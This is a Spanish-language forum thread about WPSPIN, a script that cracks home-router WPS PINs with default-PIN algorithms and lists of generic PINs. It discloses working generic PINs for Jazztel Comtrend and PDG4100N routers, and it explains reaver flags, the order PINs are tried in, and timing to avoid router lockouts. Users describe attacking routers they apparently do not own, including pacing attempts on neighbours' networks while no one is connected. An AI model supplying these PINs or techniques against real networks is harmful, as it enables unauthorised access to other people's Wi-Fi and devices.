Publicado por: ohoo en Marzo 12, 2014, 15:52:14 pm
te ha enviado un mensaje privado kcdtv, haroll
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Marzo 12, 2014, 17:07:58 pm
He recibido los datos, muchas gracias ohoo  :)

Cita de: haroll
ninguno coincide el pin y parece ser que no tiene uno genérico si no cada router el suyo

Si son PIN por dfecto y no hay una relación directa bssid PIN a primera vista, es otro algoritmo que los conocidos.

Cita de: haroll
.Si os hace falta información de MAC,ESSID,BSSID,S/N,PIN,y alguna cosa mas que puede servir de ayuda para intentar encontrar alguna relación entre esos datos y el pin que se genera.Me lo decís y los reúno.Un saludo.

Estupendo...  más datos mejor.  :)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: atim en Marzo 24, 2014, 15:26:21 pm
   Buenas;

   Probado con exito en una Orange-XXXX con mac 88:E3:AB (HG532S). He mirado en la lista y no la he visto por lo que entiendo que es una nueva mac soportada. Si es así decidmelo y mando los datos.

   Un saludo.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Marzo 24, 2014, 15:32:53 pm

Lee  aquí    atim

Cita de: maripuri
Muy importante como hemos recalcado en varias ocasiones que el BSSID no se encuentre en la lista NO es necesariamente indicativo de que no sea compatible,  un BSSID / modelo router que no aparezca en ella puede deberse a dos motivos distintos

a)   
    1)  no es compatible (seguramente se habrá comentado algo a lo largo del hilo o se hará..)
    2)  aún no está disponible la lista en donde se indica que se ha comprobado y si lo es.

b) NO se dispone de datos con lo cual no pudo ser comprobado aún.

Si haces el favor adjunta la info gracias.

pd. recuerda: imágenes



Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Marzo 24, 2014, 15:47:05 pm
 :)
Gracias de antemano atim 
   ....me parece que habemus bssid  ;)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: atim en Marzo 24, 2014, 15:50:05 pm
De nada para eso estamos kcdtv.  ;)

Acabo de mandarle un privado a maripuri con los datos en una imagen.

   Un saludo.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Marzo 24, 2014, 18:30:47 pm
atim, mira el MP y muchas gracias por la info..

parece que:


(https://i.postimg.cc/yd34knBV/habemusbssid.jpg)


ESSID:     Orange-XXXX
BSSID:     88:E3:AB
MODEL:    HG532S



Un saludo.

Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: atim en Marzo 24, 2014, 19:55:25 pm
   De nada maripuri, para eso estamos para aportar y colaborar en lo que podamos.

   Te acabo de mandar otro mp.

   Salu2.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: 1camaron1 en Marzo 24, 2014, 21:36:58 pm
yeahhh!  ;D
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: cristobapuerto en Abril 19, 2014, 21:06:17 pm
Es increible el gran trabajo que realizais , es una gran ayuda la que me aportais con el WPSPIN, desde aqui mi mas sincera enhorabuena! Coeman y todos aquellos que haceis que esta web sea tan increible! chapó!!  8)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: Coeman76 en Abril 19, 2014, 23:41:02 pm
Gracias a ti por los elogios :)

Pero yo soy el mas "pollo" de los que formamos este equipo.

Permiteme repartir los elogios entre maripuri,kcdtv(creador de WPSPIN),1camaron1,betis-jesus,erborricobueno,pinty...

Un saludo
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Abril 20, 2014, 02:13:47 am
Aprovecho la oportunidad para citar también a antares_145 y r00tnuLL  :)
Sin ellos nunca hubiera podido hacer WPSPIN.
 
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kyrandio en Abril 20, 2014, 08:32:48 am
bravo por tod@s vosotr@s :) seguir asi compis!! jeejeje.

[time]Abril 20, 2014, 23:43:30 pm[/time]
hola compis, he visto que la redes Orange-xxxx con mac: 88:E3:AB una pagina anterior a este post se sabe el pin, "El Habemus vaya" (o eso creo yo)...en el listado de el wps pin de Windows no está en el listado...¿tiene un pin en concreto o como está el tema?...gracias compis. no me ha quedado muy claro

saludos.

Abril 20, 2014, 23:51:32 pm
hola compis, he visto que la redes Orange-xxxx con mac: 88:E3:AB una pagina anterior a este post se sabe el pin, "El Habemus vaya" (o eso creo yo)...en el listado de el wps pin de Windows no está en el listado...¿tiene un pin en concreto o como está el tema?...gracias compis. no me ha quedado muy claro

saludos.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Abril 21, 2014, 09:57:56 am
kyrandio, los listados se actualizan cuando se publican nuevas revisiones de las aplicaciones..  si ves que a lo largo de las respuestas del hilo se descubre un nuevo BSSID y en la lista no aparece ese es el motivo (es algo obvio).

Se ha comentado en varias ocasiones:

Cita de: maripuri
Muy importante como hemos recalcado en varias ocasiones que el BSSID no se encuentre en la lista NO es necesariamente indicativo de que no sea compatible,  un BSSID / modelo router que no aparezca en ella puede deberse a dos motivos distintos

a)   
    1)  no es compatible (seguramente se habrá comentado algo a lo largo del hilo o se hará..)
    2)  aún no está disponible la lista en donde se indica que se ha comprobado y si lo es.

b) NO se dispone de datos con lo cual no pudo ser comprobado aún

Citar
¿tiene un pin en concreto o como está el tema?
Veo que aún persisten las dudas entre lo que es un PIN por defecto y un PIN genérico.

Un PIN por defecto es aquel que viene de fábrica en un router / modelo concreto y UNICAMENTE en dicho router.. este PIN por defecto es el que se obtiene con la vulnerabilidad que aprovecha WPSPIN (los algoritmos conocidos).

un PIN GENERICO es aquel que se encuentra en TODOS los routers de un modelo (o modelos) concretos..  se incluyen en WPSPIN pero provienen de otro debate..  del hilo Patrones de PIN para WPA y NO se obtienen de los alogoritmos de que hablamoas antes. 

Los router pueden contener 1 PIN genérico o como hemos visto en algunos modelos existen mas de 1.

Con las herramientas para Windows obtendrás el mismo resultado (esté o no esté en la lista por lo que he explicado)

Procura no hacer re-post.. si alguien no te respondió antes tal vez es que no haya visto tu respuesta..   ;)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kyrandio en Abril 21, 2014, 10:52:45 am
gracias maripuri por las aclaraciones respecto a los pins :)

por otro lado comentar que no es que hice el repost a cosa hecha, sino que cuando lancé el primer párrafo en el hilo correspondiente...ví que en "Inicio" (donde nos aparece a todos en pantalla lo que se va diciendo de los varios temas) no se había puesto dicho tema...por eso pensé que era fallo mío y lo dupliqué, ya que no lo ví, disculpas :P
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Abril 21, 2014, 14:56:03 pm
Citar
ví que en "Inicio" (donde nos aparece a todos en pantalla lo que se va diciendo de los varios temas) no se había puesto dicho tema
Cuando se hace respost la nueva respuesta se une a la existente, por tanto no queda reflejada como nueva respuesta y no aparece en el portal.     ;)

¿Te queda alguna duda sobre los PIN o lo has entendido?  tanto el script de linux como el de Windows te devolverá el PIN si este está afectado por los alogoritmos implementados. Si es genérico se irá añadiendo en las próximas revisiones.


Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Abril 21, 2014, 18:25:40 pm
Citar
¿tiene un pin en concreto o como está el tema?

WPSPIN por defecto ataca con el PIN generado con el algoritmo en uso en este routeur
Te saldrá en naranja como no seguro-desconocido...
...Pero el primer PIN propuesto es el bueno y en la próxima versión saldrá en verde.   ;)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kyrandio en Abril 21, 2014, 20:48:37 pm
gracias compis por todo!! si, si, ya entiendo lo de los pins!! saludos :)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: cristobapuerto en Abril 24, 2014, 04:00:39 am
Llevo unos dias probando un nuevo router MOVISTARXXX con una bssid diferente, el pin sale uno q no es ninguno de  los 2 habituales y pone desconocido pero el WPS no tiene el pin... Mañana esi quereis paso mas datos y aver si doy con el PIN... Si alunos sabeis algo sobre el tema comentenme graciss!! WPSPIN + KALINUX o BTCK 5 van muy bien en VMWare y tengo el acrylic para Dlink jiji ..

Abril 24, 2014, 10:50:55 am
Llevo varios dias observando unos modelos nuevos de BSSID de MOVISTARXXXX en los cuales el WPSPIN no te la uno de los 2 PIN que suele dar por defecto..

ESSID : MOVISTAR_5DXX
BSSID : F8:63:94:XX:XX:XX
POSIBLE PIN: 7153XXXX

ESSID : MOVISTAR_D6XX
BSSID : F8:C3:46:XX:XX:XX
PIN     : ¿?¿?¿?

Utilizo el comando -n -t 2 -T 2 -vv y me llega el M6, pero no consigo sacarle el M7 siempre para en el M6 y luego sale de nuevo M5 y falla la transaccion, si alguien me pudiera aportar un poco de ayuda sobre estos Routers lo agradeceria! saludoss  8)  :o
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: Coeman76 en Abril 24, 2014, 11:11:29 am
Hola

Porque preguntas lo mismo en dos hilos diferentes?.

Crees que si lo publicas en varios hilos obtendras una rápida respuesta?

yo creo que obtienes el efecto contrario.

Cuando alguien quiera te respondera ;)

Un saludo
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: cristobapuerto en Abril 24, 2014, 11:16:05 am
Lo siento es que los dos hilos estan relacionados , no es porque me respondan rapidamente , no tengo prisa , otra vez lo pongo :o en 1
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: elloh en Mayo 11, 2014, 17:00:05 pm
WOO WOO!! increíble el trabajo un script q tiene una base de datos de pin q es lo q me volvia loco para atacar esas "WaPA" sale perfecto con movistar, wlan y Vodafone incluso cuando pone en amarillo los posibles pin , lo q si me esta dejando un poco mosca es q cuando se hace el escaneo nunca muestra wifis de JAZZTEL , lo digo xq ya he visto en varias ubicaciones y no hay manera de q muestren estas redes inclusive la mia propia q es Jazztel, estoy haceindo algo mal? solo lo pregunto x si estoy cometiendo algún error

Q conste q no me kejo solo keria saber si me estoy equivocando ME ENCANTAAA este programa MUCHAS GRACIAS
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: Coeman76 en Mayo 11, 2014, 17:05:10 pm
Hay que documentarse un poco antes de hacer este tipo de preguntas muy básicas.

Si la herramienta lo que busca es atacar el protocolo WPS pues evidentemente deberá de estar el WPS activado en el dispositivo para que este salga en el escaneo.

Activa el WPS en tu router y veras como sí aparece ;)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: XiaoLux en Mayo 11, 2014, 21:18:36 pm
Le agradezco el aporte
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: elloh en Mayo 11, 2014, 23:54:54 pm
Hay que documentarse un poco antes de hacer este tipo de preguntas muy básicas.

Si la herramienta lo que busca es atacar el protocolo WPS pues evidentemente deberá de estar el WPS activado en el dispositivo para que este salga en el escaneo.

Activa el WPS en tu router y veras como sí aparece ;)

wenas muchas gracias x responder pues lo tengo activo de hecho es un router Jazztel q teneis el pin en otro post vamos q es antiguo  es de ahí  donde sacaba yo antes los pines para hacerlo con xiopan o como se llame y salía del tiron, no se q estará haciendo mal pero ya he ido a mas sitio de gente conocida y tal y es q NUNCA muestra las Jazztel como sino existiran
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Mayo 12, 2014, 11:45:10 am
WPSPIN te va devolver exactamente la misma lista de routers que inflator o reaver en xiaopan o lo que sea ya que todos usan la herramienta wash, el propio scan de reaver.
En este tipo de scan solo aparecen las redes que emiten probes WPS.
 
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: elloh en Mayo 12, 2014, 11:56:26 am
WPSPIN te va devolver exactamente la misma lista de routers que inflator o reaver en xiaopan o lo que sea ya que todos usan la herramienta wash, el propio scan de reaver.
En este tipo de scan solo aparecen las redes que emiten probes WPS.

un honor tener una respuesta del desarrollador , jeje weno pues ya te digo con xiopan me apercen las Jazztel y añado el pin y perfecto mientras q aki q me he metido el kali Linux me aperecen todas menos las Jazztel q se a ciencia cierta q están abiertos el wps, mas q na lo q veo de vital importancia es la base de datos de pin

weno gracias de nuevo, si alguien se le ocurre una idea lo agradecería
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Mayo 12, 2014, 13:04:24 pm
Citar
me apercen las Jazztel y añado el pin y perfecto mientras

Jaztell pueden ser muchas cosas  ;)
¿De que modelo de router se trata, de que inicio de bssid se trata y de que PIN por defecto ?


Citar
con xiopan me apercen las Jazztel

¿Que haces con xiaopan para escanear los puntos de acsesos?

Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: elloh en Mayo 12, 2014, 14:31:20 pm
Jaztell pueden ser muchas cosas  ;)
¿De que modelo de router se trata, de que inicio de bssid se trata y de que PIN por defecto ?


¿Que haces con xiaopan para escanear los puntos de acsesos?

fabricante            Comtrend
modelo routeur AR-5387un
essid                    JAZZTELL_XXXX dónde X son caracteres hexadecimales mayúsculas
bssid                    00:38:72:XX:XX:XX
WPA por defecto de 20 caracteres ascii 


•¡1 PIN WPS POR DEFECTO PARA TODOS LOS MODELOS!
•WPS PIN = 18836486

extraido del siguiente post http://lampiweb.com/foro/index.php/topic,8188.0.html y con xiaopan pues como siempre inicio el inflactor pongo el wifi en modo inyector y le doy a scanear y ahí si veo las Jazztel o lo q tenga el wps, ahora en este script cojonudo al hacer el escaneo no muestra las Jazztel he probado esta mñn la opcion 2 de meter la esiid y la mac y no llega al channel 11 q es donde esta se keda en el channel 5 y ya ta, lo raro q veo es q eso q no muestra las Jazztel ya me he id a varios sitios y he probado a ver si las ve y nada como si no existieran, muchas gracias

tb tengo los guild de Jazztel y wlan q vais poniendo q tan agradecido estoy jeje
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Mayo 12, 2014, 15:00:53 pm
Gracias a ti por comentar y molestarte en dar la información completa para que se pueda hacer algo  :)

Citar
y con xiaopan pues como siempre inicio el inflactor pongo el wifi en modo inyector y le doy a scanear y ahí si veo las Jazztel o lo q tenga el wps

inflator llama a wash como hace WPSPIN asi que el asunto gira alrededor de wash

Citar
l escaneo no muestra las Jazztel he probado esta mñn la opcion 2 de meter la esiid y la mac y no llega al channel 11 q es donde esta se keda en el channel 5 y ya ta

mmmm... 
parexce que tu adpatador esta "bloqeado en un canal"
Lo extraño es que WPSPIN debería levantar y bajar la interfaz para que esto no ocurra...
¿No estarías conectado a Internet con la interfez wireless?
¿O no estarías moniteorando o inyectando con la interfaz  con otro programa que usa aircrack-ng?
Si es asi esto explicaría porque tienes el esaneo bloqueado en un canal.
Sino no entiendo porque la verdad...  :P


la próxima revisión llamará a airmon-zc en lugar de airmon-ng y este tipo de problemas no van a ocurrir teóricamente ya que  se cree una interfaz única solo dedicada al mode monitor.
Esto con versiones de aircrack-ng a partir de la 1.2, es una buena mejora de airmon-ng...

¿Puedes decir que chipset usas?

WPSPIN lleva flro para detectar los rt3x7x que requieren unas maniobras suplementarias para que el chipset funcionnen un poco mejor
Me han reportado hace un par de dias atras desde crack-wifi un comportamiento similar con el iw5100n.

saludos  ;)
 


Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: elloh en Mayo 12, 2014, 20:47:00 pm
¿Puedes decir que chipset usas?

WPSPIN lleva flro para detectar los rt3x7x que requieren unas maniobras suplementarias para que el chipset funcionnen un poco mejor
Me han reportado hace un par de dias atras desde crack-wifi un comportamiento similar con el iw5100n.

saludos  ;)
mi wifi externa:

Características destacadas:
Hasta 200mW de potencia
Conector SMA hembra RP para entena externa (Incluye antena omnidireccional de 5dB)
Soporta encriptación 64/128/256 bit WEP, WPA y WPA2
Chipset Realtet RTL8187L (un poco antiguo la verdad)
802.11b+g

wenas pues eso lo hago x makina virtual y kali Linux q lei q era lo mas compatible con este script hombre el comando wash es el mismo además me meto x root lo q no he hecho es darle privilegios "chmod 777" al WPSPIN.sh ahora q lo pienso.Lo de Jazztel, lo q tb he probado es meter script en xiaopan pero la cosa es q monto el pen e inteneto buscarlo en la carpeta media y no salía xq no existe esa carpeta........ intente meter fdisk para q me mostrara donde estaba y no salía o no supe meterle bien los comando ,soy un poco nob pero se leer código
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Mayo 12, 2014, 22:32:06 pm
Tu chipset es un rtl8187l, como el que uso, cierto que es viejo  pero esta perfectamente afufado para usar con reaver y la suite aircrack-ng.  8)
Nunca me ha dado este problema...
es más bien el chipset referencia sin problemas que el chipset con problemas  :o

Citar
q no he hecho es darle privilegios "chmod 777" al WPSPIN.sh

No es necesario... y si sería esto el problema no arrancaría o no arrancaría el wash ... y en tu caso funciona pero se queda fijado en unos canales... no es un problema de privilegios o derechos, es la interfaz que hace de la suyas.

Código: [Seleccionar]
lo q tb he probado es meter script en xiaopan pero la cosa es q monto el pen e inteneto buscarlo en la carpeta media y no salía xq no existe esa carpeta
intente meter fdisk para q me mostrara donde estaba y no salía o no supe meterle bien los comando ,soy un poco nob pero se leer código

cuando montas la particion tienes que hacer también el punto de montaje

fdisk sirve para trabajar con tus discos y particiones.
por ejemplo fdisk -l te permite obtener en consola una lista de tu discos

Código: [Seleccionar]
cd
Disk /dev/sda: 60 GB, 60011642880 bytes
255 heads, 63 sectors/track, 7296 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes

   Device Boot      Start         End      Blocks   Id  System
/dev/sda1   *           1        7296    58605088   83  Linux
Warning: Partition 1 does not end on cylinder boundary.

Disk /dev/sdb: 300 GB, 300066439680 bytes
255 heads, 63 sectors/track, 36481 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes

   Device Boot      Start         End      Blocks   Id  System
/dev/sdb1   *           1        6781    54468351   83  Linux
Warning: Partition 1 does not end on cylinder boundary.
/dev/sdb2            6782       36482   238565250    5  Extended
Warning: Partition 2 does not end on cylinder boundary.
/dev/sdb6            6782       35960   234372285   83  Linux
Warning: Partition 6 does not end on cylinder boundary.
/dev/sdb5           35960       36482     4192965   82  Linux swap
Warning: Partition 5 does not end on cylinder boundary.

Disk /dev/sdc: 40 GB, 40015987200 bytes
255 heads, 63 sectors/track, 4865 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes

   Device Boot      Start         End      Blocks   Id  System
/dev/sdc1   *           1        4866    39086113    7  HPFS/NTFS
Warning: Partition 1 does not end on cylinder boundary.

Disk /dev/sdd: 60 GB, 60019868160 bytes
255 heads, 63 sectors/track, 7297 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes

   Device Boot      Start         End      Blocks   Id  System
/dev/sdd1   *           1        3649    29310561   83  Linux
Warning: Partition 1 does not end on cylinder boundary.
/dev/sdd2            3649        7298    29310592    5  Extended
Warning: Partition 2 does not end on cylinder boundary.
/dev/sdd5            3649        4575     7438095   83  Linux
Warning: Partition 5 does not end on cylinder boundary.
/dev/sdd6            4575        4693      947835   82  Linux swap
Warning: Partition 6 does not end on cylinder boundary.
/dev/sdd7            4694        7298    20916630   83  Linux
Warning: Partition 7 does not end on cylinder boundary.

Disk /dev/sde: 16 GB, 16025387008 bytes
64 heads, 32 sectors/track, 15283 cylinders
Units = cylinders of 2048 * 512 = 1048576 bytes

   Device Boot      Start         End      Blocks   Id  System
/dev/sde1   *           1         599      613360   17  Hidd HPFS/NTFS

Disk /dev/sdf: 16 GB, 16038559744 bytes
188 heads, 32 sectors/track, 5207 cylinders
Units = cylinders of 6016 * 512 = 3080192 bytes

   Device Boot      Start         End      Blocks   Id  System
/dev/sdf1   *           1        1019     3065136   17  Hidd HPFS/NTFS
/dev/sdf2            1020        5208    12597504    b  FAT32
Warning: Partition 2 does not end on cylinder boundary.
 

Tienes varios comandos para buscar una carpeta,  por ejemplo
Código: [Seleccionar]
pwd mediao
Código: [Seleccionar]
locate media
"media" se encuentra en tu directorio raíz ( / ), al mismo nivel que las carpetas root, usr, bin, etc etc...


Citar
wenas pues eso lo hago x makina virtual y kali Linux q lei q era lo mas compatible con este script

La maquina virtual es lo menos aconsejable.
Lo suyo es tirar de un linux instalado, el que sea, que tenga aircrack-ng y reaver instalados.
La ventaja de kali es que tiene repositorios para las herramientas de hacking y crack, asi que se actualizan cuando actualizas el sistema.
y también los paches par inyección y canal -1 aunque creo que desde la ultima revisión ya ni hace falta.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: ivano en Mayo 22, 2014, 00:29:56 am
sobre un -pdg-74888b- p=8820nnnn no lo reconce da 8820xxx,  y lanza  reaver, comprobado , ese despiste se puede  arreglar.
un saludo .
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Mayo 22, 2014, 01:02:42 am
Creo que hablas de un PDG4100N con essid por defecto WLAN_XXXX y con incio bssid 74:88:8b;
Hasta aqui te entiendo

luego supongo que hablas de un problema en la segunda mitad del PIN....

los PIN genéricos para este rango de mac son los siguientes y en este orden


Código: [Seleccionar]
PIN=43297917
PIN2=73767053
PIN3=88202907
PIN4=16538061
PIN5=16702738
PIN6=18355604
PIN7=19756967
PIN8=13409708

lo que va a hacer revaer es lo siguiente,


probar 43297917       >   intento 1

como no obtiene la primera mitad va seguir probando primera mitades

 7376791X  > intento 2 con la primera mitad del segundo PIN

 8820791X > intento 3 con la primera mitad del PIN numero 3 de la lista... ya tenemos la primera mitad así que a a partir de ahora busca la segunda mitad

 8820705X  > intento 4 con la segunda mitad del PIN numero 2 , este es el intento que nos podríamos ahorrar

 88202907 > intento 5 , con el pin completo

Es el funcionamiento de reaver que es asi.

Se podría parrar cuando se obtiene la primera mitad del  PIN y generar un fichero nuevo y luego volver a lanzar el ataque pero se pierde mas tiempo que tirando un PIN más.
Ademas de consumir mas recursos para "vigilar" el log para parrar el proceso...

Creo que no cunde sobre todo que este modelo se deja reaver sin problemas y rapido, los PIN se tiran en un segundo, que sea 4 o 5 intentos no cambia nada.

en el peor de los casos te toca el PIN 13409708,
 lo que significa tirar 8PIN para llegar a la primera mitad y luego 7 mas.
se podría reducir de 6 intentos, que serían ahorar 6-8 segundos.

Pero por otro lado se pierde tiempo :
 el tiempo de que se asimile que se ha obtenido la primera mitad y que se parre, ( 1 segundo )
 que se vuelva a generar el fichero ( 3 segundos o mas)
 que se vuelve a reorientar en el menu y lanzar reaver con los parametros ( 1 segundo )
 y por fin que se vuelva a asociar  y tiar el PIN para obtenr la llave ( 4 segundos  )
 
Al final no ganas nada o incluso es mas lento...


 
 
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: ivano en Mayo 22, 2014, 01:39:41 am
me parece que no me he explicado conociendo el pin el prg no lo admite
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Mayo 22, 2014, 01:48:18 am
Si quieres entrar un PIN otro que el propuesto usas el opción 2

Código: [Seleccionar]
2 - ENTRAR OTRO PIN
y entras los siete primeros números del PIN ( sin el checksum )    ;)
si quieres probar el PIN 12345670
tienes que entrar 1234567

(http://storage7.static.itmages.com/i/14/0124/h_1390601263_7774931_7274b5602f.png)

PD: Poniendo el PIN entero que te da problemas... ¿ quizá nos entenderíamos mejor?  ;)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: ivano en Mayo 22, 2014, 02:00:40 am
se usarlo. si mi pin es 12341234 y wpspin dice que es 12351235. teneis u n problema en la base de datos
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Mayo 22, 2014, 02:29:36 am
Si tienes un problema en poner las datos aqui manda los por privado
Porque no hay forma de saber de que estas hablando,  :o con toda la mejor voluntad del mundo,  lo siento..  ???

el PDG4100N tiene estos 8 PINES genericos conocidos desde 2012...
Si alguno no esta manda los datos por privado como de constumbre.

Citar
se usarlo. si mi pin es 12341234 y wpspin dice que es 12351235. tenéis un problema en la base de datos

Me parece que no has entendido lo que te explicado antes en mi primera respuesta sobre el desfase en las mitades de PIN  ;)
Pon unas capturas de pantalla  si te cuesta explicarte ...
Y dinos el PIN que te  da problemas porque 12341234 o 12351235 no es en todo casos.  :D

Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: ivano en Mayo 23, 2014, 00:13:03 am
muchas gracias por tu interes y paciencia. Todo comprendido, las 74888b que entran en esta zona tienen el 8820 y  2  tienen bloqueo de 24H con el pin herroneo a los 3 intentos, he consegido probar sin exito todos, uno cada 45 min sin bloquearlo y nadie conectado. cuando tenga el pin te lo mando.
 Modificando el orden de entrada  del pin en el script lo saca .
Un saludo
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Mayo 23, 2014, 00:38:36 am
De nada hombre ...
 Gracias a ti por probar y reportar fallos , reportar tus experiencias o hacer sugerencias

Citar
y  2  tienen bloqueo de 24H con el pin herroneo a los 3 intentos

WoW
En este caso si que cunde parrar el ataque a cada PIN para no tener desfase y tirar los PIN genéricos de uno en uno...

Citar
Modificando el orden de entrada  del pin en el script lo saca .

¡Así se hace!  :D

El orden puesto lo he echo de forma empírica completamente arbitraria... he mirrado los datos que tenemos  y he puesto para cada bssid como primero PIN el que salía mas....
Pero para cada bssid tenemos datos con todos los PIN genericos asi que realmente es cuestión de suerte.
También una cosa respecto a este router : es que se cambia de PIN por defecto si se hace un reset.


 
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: broe en Mayo 27, 2014, 01:52:43 am
Buenas.he estado testeando tu gran script y darte la enorabuena de antemano y vamos al lio e conseguido un par minimo con los pins en naranja.si quieres te paso las capturas por privado por si se tirnen que añadir.eso ya es cosa vuestra.
Saludos 8)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Mayo 27, 2014, 02:05:57 am
Buenas
Yes... ...Si me puedes pasar estos datos por MP nos interesan muchísimo.
Gracias por tu comentario  :)
 


Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: Rebound en Junio 06, 2014, 19:46:04 pm
Hola amigos,

Disculpen mi español, pero soy de Portugal.
En los últimos meses estoy con Linux Kali.

Siempre que utilize Reaver, siempre utiliza el mismo pin. El router es uno Thomson. 2 meses antes tenia uno Hitron (Huawei?)
Tengo Buenos know-how de Linux e pouco know-how de Wifislax pero ya tengo la version 4.8.
Miro en la web que existe uno mdk3 brute force para hacer unlock del router.

Bueno.. adelante... tiene usted alguna idea de por dónde empezar? :) Con esse script?
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Junio 06, 2014, 20:13:39 pm

Citar
Disculpen mi español, pero soy de Portugal.
obrigado  :D
Bienvenido al foro  ;)

Citar
En los últimos meses estoy con Linux Kali.
Buena elección  8)

Citar
El router es uno Thomson. 2 meses antes tenia uno Hitron (Huawei?)
Los thomson (ahora Technicolor) con configuración de fabrica suelen llevar rate limit en los firmware modernos y se desconoce patrones o PIN genéricos.
Pero no se puede descartar que el ISP haya cambiado el firmware
No se si Hitron pertenece à Huawei, lo ue si sabemos es que aquí en España hay Hitron de OnO y Huawei de vodafone y FTE vulnerables al mismo algoritmo, ( que utiliza WPSPIN)

Citar
Miro en la web que existe uno mdk3 brute force para hacer unlock del router.
existe.
A nadie le ha funcionado pero existe  :D
Por probar...

Citar
Bueno.. adelante... tiene usted alguna idea de por dónde empezar?  Con esse script?
¿Porque no?
Con el script sabrás enseguida si la red esta soportado o no y podrás probar algunos PIN "posibles" si no esta soportada...
Es una opción entre otras...

saludos
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Julio 11, 2014, 21:50:59 pm

Buenas.. a los usuarios de wpspin linux leed aquí
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: fralpino en Julio 13, 2014, 23:31:02 pm
gracias por el curro
 :) :) :)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: doragasu en Agosto 25, 2014, 15:01:58 pm
Buenas,

Soy un novatillo en esto de las auditorías WiFi, por ahora he probado a romper alguna red WEP y alguna WPA capturando handshake y con diccionario. Ahora me gustaría probar un poco ataques WPS y acabo de dar con este script que parece la panacea.

Mi particularidad es que los ataques los estoy haciendo con la consola OpenPandora, que para mi sorpresa tiene un adaptador wifi compatible con modo monitor y con capacidad de inserción de paquetes.

